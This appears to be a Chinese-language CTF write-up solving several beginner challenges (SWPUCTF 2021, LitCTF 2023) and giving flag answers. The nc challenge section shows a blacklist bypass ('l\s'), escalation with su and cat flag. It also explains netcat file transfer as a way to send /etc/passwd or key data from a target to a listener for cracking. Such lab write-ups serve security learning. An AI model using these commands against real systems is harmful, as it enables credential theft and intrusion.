1.[SWPUCTF 2021 新生赛]gift_F12
1)打开题目
2)看源码
3)直接ctrl+f搜索flag
2.[SWPUCTF 2021 新生赛]nc签到
1)开题
2)下载附件用记事本打开
3)打开kali使用nc连接代码
输入l\s命令绕过黑名单
再输入su命令换成root模式
最后输入cat flag命令即可查看flag
Netcat(简称nc)主要用于两台设备之间的交互,即侦听模式/传输,是一款强大的命令行网络工具,用来在两台机器之间建立TCP/UDP连接,并通过标准的输入输出进行数据的读写。
nc使用方式
1. 实现连接通讯
建立连接(服务端——客户端);
服务端:nc -lnvp +端口
客户端:nc + 服务端IP + 端口
代表监听本地的端口,输出结果不加域名。
2. 传输文件内容
从客户端传输给服务端,此方法可以用来传递/etc/passwd等口令或密钥信息,获取后可以考虑爆破;
服务端(kali):nc -lvp +端口 > 文件完整名 客户端(靶机):nc + 服务端IP + 端口 < 文件完整名
3.[SWPUCTF 2021 新生赛]re1
1)打开题目,下载附件并打开
2)直接打开无效,尝试使用ida打开
F5查看伪代码
由代码分析它的构成
这里由c代码可知它应该是使用ASCII编码互换,将a换成了3,e换成了4最后形成{34sy_r3v3rs3}
反之原来的flag为
{easy_reverse}
4.[SWPUCTF 2021 新生赛]crypto6
1)打开题目下载附件,内容如下
2)由附件内容大体可知它是混合解码
这里直接用工具打开解码,可以看出它是base32base64混合加密,直接解码可以得出
最后加上NSSCTF{}
即flag为NSSCTF{5e110989-dc43-1bd3-00b4-9009206158fe}
5.[LitCTF 2023]404notfound (初级)
1.打开题目,下载附件打开为一张图片
2)这里我选择直接用kali输入命令strings 加 |grep {*}
打开图片即可查看flag
命令解析
命令 strings file | grep {}
的意思是:
-
strings file
:strings
命令用于提取文件中可打印的字符串。通常用于二进制文件、可执行文件或某些类型的数据文件。file
是你要分析的文件名。
-
|
:- 管道符号(
|
)用于将一个命令的输出传递给下一个命令作为输入。
- 管道符号(
-
grep {}
:grep
是一个强大的文本搜索工具,用于搜索输入文本中的匹配模式。{}
是想要查找的模式。可以用任何你想匹配的字符串或正则表达式替代{}
。